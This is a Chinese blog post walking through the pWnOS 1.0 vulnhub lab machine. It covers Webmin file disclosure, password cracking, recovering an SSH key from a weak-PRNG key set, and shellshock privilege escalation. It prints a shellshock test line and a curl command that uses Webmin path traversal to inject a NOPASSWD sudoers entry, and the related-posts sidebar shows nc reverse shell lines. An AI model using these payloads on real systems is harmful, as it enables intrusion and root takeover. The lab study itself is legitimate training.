第七篇红队笔记-百靶精讲之pWnOS1.0-Authorized_keys-prng-shellshock

于 2024-06-08 00:16:15 发布
阅读量495 收藏 3
点赞数 4
文章标签: 笔记 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin741admin/article/details/128618171
版权

方法一

主机发现

在这里插入图片描述

nmap端口扫描

在这里插入图片描述
在这里插入图片描述

Web渗透

在这里插入图片描述在这里插入图片描述

Webmin文件泄露漏洞利用

  • 确认cms
    在这里插入图片描述
  • 发现漏洞
    在这里插入图片描述

john密码破解

在这里插入图片描述

获得初始shell

在这里插入图片描述

利用权限配置不当提权

  • 不能理解为什么exp后反弹的却是root

  • 生成cgi

  • 下载cgi
    在这里插入图片描述

  • 监听
    在这里插入图片描述

Root

在这里插入图片描述

方法二

Authorized_keys文件获取

在这里插入图片描述

发现敏感文件的经验(精)

在这里插入图片描述

用公钥信息破解出私钥(精)

  • prng:伪随机数生成器(pseudorandom number generator,PRNG),又称为确定性随机位生成器(deterministic random bit generator,DRBG),是用来生成接近于绝对随机数序列的数字序列的算法。一般来说,PRNG 会依赖于一个初始值,也称为种子,来生成对应的伪随机数序列。只要种子确定了,PRNG 所生成的随机数就是完全确定的,因此其生成的随机数序列并不是真正随机的。
  • 下载公钥私钥库
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  • 复制公钥部分,拿去对碰
    在这里插入图片描述
    在这里插入图片描述

处理ssh登录参数问题(精)

  • 一定要在具有rsa文本的路径执行
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

获得系统初级权限

在这里插入图片描述

提权

内核提权及经验(精)

  • 内核版本先不写全
  • 优先获取权限:grep ‘Privilege Escalation’
    在这里插入图片描述
    在这里插入图片描述

shellshock提权(精)

在这里插入图片描述

  • 判断是否shellshock
    1 bash version < 4.3
2 输入检查语句:linux:env x=() { :;}; echo XXXXXX’ bash -c “echo This is a test code",XXXXXX」就是表示系统有漏洞
    在这里插入图片描述
sudoers权限精要
  • 新建shellshock.cgi文件
    在这里插入图片描述
  • 访问shellshock.cgi文件
    在这里插入图片描述
    sudo curl http://10.0.2.128:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/shellshock.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers'
    在这里插入图片描述在这里插入图片描述

总结

其他

authorized_keys文件

  • /home/vmware/.ssh/authorized_keys 是各个公钥存放的路径
  • 比如本地window 想免密码直接ssh连接linux,
    • window先本地生成id_rsa私钥和id_rea.pub公钥
    • 通过类似scp工具把id_rea.pub公钥上传目标linux的.ssh/authorized_keys目录

prng

  • 确定性随机位生成器。PRNG 会依赖于一个初始值,也称为种子,来生成对应的伪随机数序列
  • 在公钥文件库里,拿公钥文本碰撞出对应的公钥文件
  • grep -lr “公钥文本”
zgcadmin
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
笔记专属-shell备忘录
Gamma_lab的博客
04-02 4277
前言: ​ 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,成员必会! 最全。 反向shell-备忘录: ​ 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来,反弹shell是非常有必要的,以下将从不同的工具出发, nc listen: nc -nlvp PORT connect: nc -e /bin/sh IP PORT or nc -c sh I
Goby-win-x64-2.4.7版本
07-27
Goby专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
vulnhub-----pWnOS1.0靶机
最新发布
woshicainiao666的博客
03-22 434
首先拿到一台靶机,就需要知道靶机的各种信息(IP地址,开放端口,有哪些目录,什么框架,cms是什么,网页有什么常见的漏洞,如sql注入,命令执行,文件包含等…),及各种收集工具的使用。
笔记(1):与渗透测试
qq_51515209的博客
11-30 1509
整体概念与相关名词的介绍
靶机之PWOOS1.0
m0_63285023的博客
04-15 223
mgmt manegement管理系统。/etc/passwd(查看文件包含)编写shell,修改为kali的ip。把有文件包含路径在kali打开。在漏洞库中查询webmin的漏洞。切换到暴露的目录(前台目录)切换到临时目录再上传否则失败。接脚本扫描暴露的webmin。给shell.cgi权限。预估是系统的常用账号。
学习笔记--->Day1
huohaowen的博客
02-08 1756
而我的朋友,内网!!!!!才是真正的战场!!!!!!!!!!!!!!!!!
GOBY 版 GOBY205REDTEAM-1288-POCS-by-hlop-orz-zen
11-16
【标题】"GOBY 版"指的是一个针对操作的工具包或软件版本,名为GOBY,特别标记为205REDTEAM,版本号为1288,由hlop_orz_zen进行POCS(Proof of Concept,概念验证)开发。这个版本可能是一个定制的安全测试...
渗透打点工具-FindUpload
03-07
渗透打点工具-FindUpload】 在网络安全领域,渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
goby&社区版-win-64-2.4.7
11-27
《Goby与社区版:安全扫描与漏洞检测的利器》 在网络安全领域,漏洞扫描和安全测试是至关重要的环节。Goby是一款备受瞩目的工具,它为(网络安全攻防演练中的攻击方)和社区用户提供了一流的支持。"goby...
Invoke-Recon:“ Powershell脚本有助于域枚举和快速获胜”-基本上是在pentesteracademy进行“高级”实验时编写的
04-11
Powershell脚本是AD枚举的第一步。 Quickwins专注。 因为一遍又一遍地键入相同的Powershell命令很繁琐。 先决条件 Git克隆并运行: git clone --recurse-submodules ...
笔记-1(主机发现,情报收集,内网信息收集)
5L2g556F5ZWl77yf
12-21 4620
文章目录一. Favicon Hash 碰撞(非常好用)二. DNS域传送三. 子域名爆破四. 在线网站 搜索引擎 与 IP 反查五. 开源情报 与 搜索引擎六. whois 与 备案信息七. 真实IP识别 与 指纹识别八. SSL 证书查询 与 敏感目录九. 目标邮箱收集 与 WAF 探测 最近面试遇到很多面试官问信息收集,把以前比较乱的资料的再次整理一遍。 一. Favicon Hash 碰撞(非常好用) 找 favicon 生成hash https://github.com/Viralmaniar
笔记」靶机:Prime1 - 信息收集和分析能力的试炼
m0_73612768的博客
12-12 1162
本文是作者在观看 B 站《笔记》后做的一些笔记及相关知识的补充。学渗透特别推荐大家去看。如有侵权,请联系作者,作者看到后会第一时间删除。
网络安全学习笔记——实战攻防(上)
just do it
11-18 1071
主要复盘总结现有防护系统的不足之处,为后续常态化网络安全防护措施提供优化依据。在日常运维上以实战思想进一步加强安全防护措施,提高整体防守能力。
笔记(2):信息收集篇(一)
qq_51515209的博客
12-01 991
,信息收集,被动信息收集,Reconnaissance
打靶:pWnOS1.0打靶思路详解之webmin漏洞利用(vulnhub)
Bossfrank的博客
06-30 1029
本文详述了vulhub靶机pWnOS1.0的打靶过程。涉及到知识点包括文件包含漏洞、webmin任意文件泄露、john密码破解、perl反弹shell等。靶机难度不高,但很良,渗透过程环环相扣,每一步都逻辑清晰。
记录一次pWnOS1.0打靶(vulnhub) webmin漏洞利用
chencyyan的博客
01-14 1063
萌新第一次写blog,各位大佬别喷。有错误和补充的地方希望各位大佬各位师傅指出​本博客内容借鉴Bossfrank和笔记大佬「笔记」靶机pWnOS1.0 - 在Perl CGI架构下构造反弹shell,你可以吗?打靶:pWnOS1.0打靶思路详解之webmin漏洞利用​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?
笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 1030
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
第十八篇笔记-百靶之CONNECT THE DOTS-jsfuck(心脏图),polkit(权限),图片隐写,莫尔斯码(._图)
admin741admin的博客
12-01 238
搜索文件高权限运行bash时候,也能运行polkit?临时拥有文件所有者的身份执行polkitJSFuck 只使用6种字符 []!()+来书写任何Javascript代码。当然,用这种方式写出来的代码会很长。JSFuck不需要依赖浏览器,也可以在Node.JS上运行。
"网络安全渗透测试与漏洞:和蓝发展计划 - Part 1
O "Plano de Estudos Cyber Security - Parte 1 Red Team.pdf" é um recurso elaborado por Joas Antonio, voltado para auxiliar os estudos em segurança cibernética, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值